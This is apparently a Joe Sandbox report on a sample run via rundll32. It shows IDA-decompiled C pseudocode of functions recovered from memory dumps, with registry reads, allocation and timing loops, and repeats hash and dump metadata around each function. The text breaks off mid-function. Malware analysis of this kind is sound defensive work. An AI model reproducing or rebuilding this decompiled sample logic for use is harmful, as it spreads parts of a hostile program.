                                                                                                                                                                                                                                    					_t23 = E04C3A279(_a4, __ecx, _t35, _t40,  &_v8,  &_a4, __eax);
                                                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                                                    					_t28 = _t23;
                                                                                                                                                                                                                                    					goto L7;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				__imp__();
                                                                                                                                                                                                                                    				if(__eax == 0) {
                                                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t23 = E04C38B94(_a4, __ecx, _t35, _t40,  &_v8,  &_a4, __eax); // executed
                                                                                                                                                                                                                                    				goto L5;
                                                                                                                                                                                                                                    			}












Memory Dump Source
• Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
• Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
• Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
• Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 98539cf550a2c2924d36ae7902fa147a08c309b3f3a664c41612ddb2bfb31a62
• Instruction ID: ffee09e7f4a58df857354f70d66e50feeb4d057e275347596905163f82816070
• Opcode Fuzzy Hash: 98539cf550a2c2924d36ae7902fa147a08c309b3f3a664c41612ddb2bfb31a62
• Instruction Fuzzy Hash: 9A21107A201204EBEB11EF55D884FAA37FDEB48756F004016F902E7150D779EE459BB1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
• Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
• Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
• Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e43a17e9097d47ef36fb9b26de0ed49ea0b9078825df613cffc98eb58fa58706
• Instruction ID: 93c28dda68366068ec79e272e05c3fbec5b5e43ae90e1721f6e08f43207b066e
• Opcode Fuzzy Hash: e43a17e9097d47ef36fb9b26de0ed49ea0b9078825df613cffc98eb58fa58706
• Instruction Fuzzy Hash: B6212CB5900259FFEB019F94DD84EEEBB7AEB44705F000065E511A6150C7759E05EB50
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 674962a4bc9a27ac5fb9a572901c775df9df83adbc0775b1d76aed642f4fb702
                                                                                                                                                                                                                                    • Instruction ID: c336d0b37f184ae87539a0b227567b45b19bbe1d2718fa9fa5ae11d497173ea3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 674962a4bc9a27ac5fb9a572901c775df9df83adbc0775b1d76aed642f4fb702
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D2102BA600204BFD721EBA4DC05F9E37BAEB48706F1841A1F605E7190EB70AA008B60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E04C33D0D(intOrPtr* _a4, void* _a8) {
                                                                                                                                                                                                                                    				void _v31;
                                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                                                    				intOrPtr _t21;
                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                    				signed int _t25;
                                                                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                                                    				intOrPtr _t40;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t25 = 6;
                                                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                                                    				memset( &_v31, 0, _t25 << 2);
                                                                                                                                                                                                                                    				_t26 = 0;
                                                                                                                                                                                                                                    				asm("stosw");
                                                                                                                                                                                                                                    				asm("stosb");
                                                                                                                                                                                                                                    				_t31 = 0; // executed
                                                                                                                                                                                                                                    				_t17 = E04C383B7( *0x4c3d258,  &_v32); // executed
                                                                                                                                                                                                                                    				if(_t17 != 0 && _v31 > 2) {
                                                                                                                                                                                                                                    					_t23 = (_v31 & 0x000000ff) + 0xfffffffe;
                                                                                                                                                                                                                                    					_t26 = 0;
                                                                                                                                                                                                                                    					if(_t23 > 0) {
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t31 = _t31 +  *((intOrPtr*)(_t32 + _t26 * 4 - 0x10));
                                                                                                                                                                                                                                    							_t26 = _t26 + 1;
                                                                                                                                                                                                                                    						} while (_t26 < _t23);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t39 = _t31;
                                                                                                                                                                                                                                    				 *0x4c3d270 = _t31;
                                                                                                                                                                                                                                    				if(_t31 != 0) {
                                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                                    					_t19 = E04C3924F( &_a8); // executed
                                                                                                                                                                                                                                    					__eflags = _t19;
                                                                                                                                                                                                                                    					if(_t19 == 0) {
                                                                                                                                                                                                                                    						__eflags = _a8 - 0x1000;
                                                                                                                                                                                                                                    						if(_a8 == 0x1000) {
                                                                                                                                                                                                                                    							goto L10;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t21 = E04C37923(_t26, _t39);
                                                                                                                                                                                                                                    					_t40 =  *0x4c3d270; // 0xd448b889
                                                                                                                                                                                                                                    					 *_a8 = _t21;
                                                                                                                                                                                                                                    					if(_t40 != 0) {
                                                                                                                                                                                                                                    						goto L8;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if(_t21 == 0) {
                                                                                                                                                                                                                                    							L10:
                                                                                                                                                                                                                                    							_push(5);
                                                                                                                                                                                                                                    							_pop(0);
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							 *_a4 = 1;
                                                                                                                                                                                                                                    							 *0x4c3d270 = _t21;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: dde90476db401c5555616e5daf5351ac06a98a9d295deae91bbe858792ac13fb
                                                                                                                                                                                                                                    • Instruction ID: 542057783b0805b6d614e895f79b7bf0ab19b67e791069de13ff00709d21084e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dde90476db401c5555616e5daf5351ac06a98a9d295deae91bbe858792ac13fb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B113A719102846EFF20DE75CC407BE7BA6EB44356F00453EDC12DA260D375F6858A10
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E04C36A56(intOrPtr __eax, void* __ecx, signed int __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                    				unsigned int _v24;
                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                                                    				unsigned int* _t12;
                                                                                                                                                                                                                                    				signed int _t14;
                                                                                                                                                                                                                                    				void* _t16;
                                                                                                                                                                                                                                    				signed int _t17;
                                                                                                                                                                                                                                    				unsigned int _t21;
                                                                                                                                                                                                                                    				signed int _t24;
                                                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                                                    				signed int _t31;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t24 = __edx;
                                                                                                                                                                                                                                    				__imp__(0, 0x400000, 0, _t25, _t28, __ecx, __ecx); // executed
                                                                                                                                                                                                                                    				 *0x4c3d238 = __eax;
                                                                                                                                                                                                                                    				if(__eax != 0) {
                                                                                                                                                                                                                                    					__imp__();
                                                                                                                                                                                                                                    					E04C3D1A8 = __eax;
                                                                                                                                                                                                                                    					_t11 = E04C38F10(__eax, _a4);
                                                                                                                                                                                                                                    					if(_t11 == 0) {
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t12 =  &_v24;
                                                                                                                                                                                                                                    							__imp__(_t12);
                                                                                                                                                                                                                                    							__imp__();
                                                                                                                                                                                                                                    							_t21 = _v24;
                                                                                                                                                                                                                                    							_t14 = (_t21 << 0x00000020 | _v28) >> 7;
                                                                                                                                                                                                                                    							L04C3B226();
                                                                                                                                                                                                                                    							_t31 = _t12 + _t14;
                                                                                                                                                                                                                                    							_t16 = E04C37E03(_a4, _t31);
                                                                                                                                                                                                                                    							_t17 = 2;
                                                                                                                                                                                                                                    							_t23 = _t31;
                                                                                                                                                                                                                                    							__imp__(_t17 << _t31, _t14, _t21 >> 7, 9, 0); // executed
                                                                                                                                                                                                                                    						} while (_t16 == 1);
                                                                                                                                                                                                                                    						if(E04C36B96(_t23) != 0) {
                                                                                                                                                                                                                                    							 *0x4c3d260 = 1; // executed
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t11 = E04C3225B(_t24); // executed
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t11 = 8;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t11;
                                                                                                                                                                                                                                    			}
















                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 8c7d233ebccfd749b6355849ef92635cccb72a4c7db8f155d002f7de49a2142e
                                                                                                                                                                                                                                    • Instruction ID: 70cff846a8bd7322c2640c44b9291a76a2c4aa405ce591572fb0aca5f6602791
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c7d233ebccfd749b6355849ef92635cccb72a4c7db8f155d002f7de49a2142e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7411C2777042007FE720ABA4DC09B6E76DAEB44352F104528F906D6180EBB4FD1096A1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: aacf028395e99761749461118a9eaaadb6f09fcddacb56a30a20ed249b6159eb
                                                                                                                                                                                                                                    • Instruction ID: 6df16119e649ebe6719572b64460d35293f9521e872c9a2d5d9a5269c8e3ff52
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aacf028395e99761749461118a9eaaadb6f09fcddacb56a30a20ed249b6159eb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B601B5B66053116FD3309E6A8C49F3B7F99EB86662F120518F881D7240DBB4DC0196A0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 32%
                                                                                                                                                                                                                                    			E04C321CD(void* __ecx, signed char* _a4) {
                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                                                    				signed short _t11;
                                                                                                                                                                                                                                    				signed int _t12;
                                                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                                                    				signed short* _t21;
                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                    				intOrPtr* _t26;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t23 = 0;
                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                    				_t18 = 1;
                                                                                                                                                                                                                                    				_t26 = 0x4c3d330;
                                                                                                                                                                                                                                    				E04C384D5();
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					_t8 = E04C312D4(_a4,  &_v8); // executed
                                                                                                                                                                                                                                    					if(_t8 == 0) {
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_push(_v8);
                                                                                                                                                                                                                                    					_t14 = 0xd;
                                                                                                                                                                                                                                    					_t15 = E04C3809F(_t14);
                                                                                                                                                                                                                                    					if(_t15 == 0) {
                                                                                                                                                                                                                                    						__imp__( *0x4c3d238, 0, _v8);
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						 *_t26 = _t15;
                                                                                                                                                                                                                                    						_t26 = _t26 + 4;
                                                                                                                                                                                                                                    						_t23 = _t23 + 1;
                                                                                                                                                                                                                                    						if(_t23 < 3) {
                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                                                    					_push(1);
                                                                                                                                                                                                                                    					E04C384D5();
                                                                                                                                                                                                                                    					if(_t18 != 0) {
                                                                                                                                                                                                                                    						_t21 =  *0x4c3d338; // 0x6c69b70
                                                                                                                                                                                                                                    						_t11 =  *_t21 & 0x0000ffff;
                                                                                                                                                                                                                                    						if(_t11 < 0x61 || _t11 > 0x7a) {
                                                                                                                                                                                                                                    							_t12 = _t11 & 0x0000ffff;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t12 = (_t11 & 0x0000ffff) - 0x20;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						 *_t21 = _t12;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					return _t18;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t18 = 0;
                                                                                                                                                                                                                                    				goto L7;
                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 3fa85261eca86865f0f44b96b26a4b694a5b568eb9b862701ac6ccc8214b2361
                                                                                                                                                                                                                                    • Instruction ID: 1d3c06a4cde04579819f8a46efa171535485e62e31e0cb86891a5373c16356d8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fa85261eca86865f0f44b96b26a4b694a5b568eb9b862701ac6ccc8214b2361
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8501B576200204AAFB00EFE6DC80BBA76ABEB45376F540475B945D6050D67ABD41A660
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E04C3A72D(intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                    				void* _t9;
                                                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                                                    				intOrPtr _t12;
                                                                                                                                                                                                                                    				intOrPtr _t14;
                                                                                                                                                                                                                                    				intOrPtr* _t17;
                                                                                                                                                                                                                                    				intOrPtr* _t19;
                                                                                                                                                                                                                                    				intOrPtr _t25;
                                                                                                                                                                                                                                    				intOrPtr _t27;
                                                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t28 = E04C32049(_t9, 8);
                                                                                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                                                                                    					_t11 = 8;
                                                                                                                                                                                                                                    					return _t11;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t12 =  *0x4c3d27c; // 0x202a5a8
                                                                                                                                                                                                                                    				_t2 = _t12 + 0x4c3e1bc; // 0x6f0072
                                                                                                                                                                                                                                    				_t14 = E04C37B5D(_t2, _a4, _t28); // executed
                                                                                                                                                                                                                                    				_t27 = _t14;
                                                                                                                                                                                                                                    				if(_t27 < 0) {
                                                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                                                    					E04C39039(_t14, _t28);
                                                                                                                                                                                                                                    					return _t27;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t17 =  *_t28;
                                                                                                                                                                                                                                    				_t3 = _t28 + 4; // 0x4
                                                                                                                                                                                                                                    				_t25 =  *0x4c3d27c; // 0x202a5a8
                                                                                                                                                                                                                                    				_t4 = _t25 + 0x4c3e1fc; // 0x740053
                                                                                                                                                                                                                                    				_t27 =  *((intOrPtr*)( *_t17 + 0x18))(_t17, _t4, 0, 0, _t3, 0);
                                                                                                                                                                                                                                    				if(_t27 < 0) {
                                                                                                                                                                                                                                    					_t19 =  *_t28;
                                                                                                                                                                                                                                    					 *((intOrPtr*)( *_t19 + 8))(_t19);
                                                                                                                                                                                                                                    					_t14 = _a4;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t14 = 0;
                                                                                                                                                                                                                                    					 *_a8 = _t28;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_t27 < 0) {
                                                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t14;
                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 34%
                                                                                                                                                                                                                                    			E04C39318(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                    				void* _v18;
                                                                                                                                                                                                                                    				short _v20;
                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                    				short _t17;
                                                                                                                                                                                                                                    				intOrPtr _t19;
                                                                                                                                                                                                                                    				short _t23;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t23 = 0;
                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosw");
                                                                                                                                                                                                                                    				_t15 =  *0x4c3d27c; // 0x202a5a8
                                                                                                                                                                                                                                    				_t4 = _t15 + 0x4c3e39c; // 0x6c68944
                                                                                                                                                                                                                                    				_t20 = _t4;
                                                                                                                                                                                                                                    				_t6 = _t15 + 0x4c3e124; // 0x650047
                                                                                                                                                                                                                                    				_t17 = E04C39152(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                                                                                                                                                                                                                    				if(_t17 < 0) {
                                                                                                                                                                                                                                    					_t23 = _t17;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					if(_v20 != 8) {
                                                                                                                                                                                                                                    						_t23 = 1;
                                                                                                                                                                                                                                    					} else {
			_t19 = E04C39FC9(_t17, _t20, _v12);
			if(_t19 == 0) {
				_t23 = 8;
			} else {
				*_a16 = _t19;
			}
			__imp__#6(_v12);
		}
	}
	return _t23;
}











Memory Dump Source
• Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
• Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
• Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
• Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 41%
E04C389D6(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
	char _v12;
	void* _t15;
	void* _t20;
	void* _t23;
	signed short* _t24;

	_t23 = E04C3809F(0, _a12);
	if(_t23 == 0) {
		_t20 = 8;
	} else {
		_t24 = _t23 + _a16 * 2;
		*_t24 =  *_t24 & 0x00000000; // executed
		_t15 = E04C3904E(__ecx, _a4, _a8, _t23); // executed
		_t20 = _t15;
		if(_t20 == 0) {
			__imp__( &_v12);
			_push( &_v12);
			*_t24 = 0x5f;
			_t20 = E04C3A635(__edx, 8, _a4, 0x80000001, _a8, _t23);
		}
		__imp__( *0x4c3d238, 0, _t23);
	}
	return _t20;
}









Memory Dump Source
• Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
• Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
• Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
• Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 58%
E04C31262(intOrPtr* __esi, intOrPtr _a4, unsigned int _a8, char _a12) {
	signed short _t18;
	intOrPtr _t23;
	signed int _t25;
	signed short _t26;

	if(_a4 != 0) {
		_t18 = E04C39318(_a4, _a8, _a12, __esi); // executed
		_t26 = _t18;
	} else {
		_t26 = E04C36BFA(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
		if(_t26 == 0) {
			_t25 = _a8 >> 1;
			if(_t25 == 0) {
				_t26 = 2;
				__imp__( *0x4c3d238, 0, _a12);
			} else {
				_t23 = _a12;
				*(_t23 + _t25 * 2 - 2) =  *(_t23 + _t25 * 2 - 2) & _t26;
				*__esi = _t23;
			}
		}
	}
	return _t26;
}








                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E04C354BC(void* __ecx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                                                    				intOrPtr* _t23;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t23 = __imp__; // 0x76d24a00
                                                                                                                                                                                                                                    				_t20 = 0;
                                                                                                                                                                                                                                    				_v8 = _v8 & 0;
                                                                                                                                                                                                                                    				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                                                                                                                                                                                                    				_t10 = _v8;
                                                                                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                                                                                    					_t20 = E04C32049(_t10 + 1, _t10 + 1);
                                                                                                                                                                                                                                    					if(_t20 != 0) {
                                                                                                                                                                                                                                    						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                                                                                                                                                                                                    						if(_t15 != 0) {
                                                                                                                                                                                                                                    							 *((char*)(_v8 + _t20)) = 0;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							E04C39039(_t15, _t20);
                                                                                                                                                                                                                                    							_t20 = 0;
